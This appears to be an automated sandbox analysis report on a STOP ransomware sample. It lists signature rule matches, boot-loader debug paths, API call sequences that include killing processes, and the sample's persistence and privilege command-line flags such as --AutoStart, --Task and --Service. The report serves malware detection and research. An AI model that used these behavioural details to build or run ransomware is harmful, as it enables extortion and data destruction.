                Source: 00000005.00000002.1868782664.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000005.00000000.1855703010.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000003.00000000.1702755799.0000000000EEC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7020, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6252, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6684, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPEDMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPEDMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.obj
                Source: winload_prod.pdb.2.drBinary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.obj
                Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@9/1154@3/2
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00481900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,0_2_00481900
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_00482440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,0_2_00482440
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCode function: 0_2_0047D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,0_2_0047D240
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].jsonJump to behavior
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --ForNetRes0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Task0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --AutoStart0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Service0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: X1W0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: x2X0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: x*W0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: C:\Windows\0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: D:\Windows\0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: 7W0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: %username%0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: F:\0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --ForNetRes0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsAutoStart0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: IsTask0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Task0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --AutoStart0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Service0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: X1W0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: --Admin0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: x2X0_2_00489F90
                Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeCommand line argument: x*W0_2_00489F90
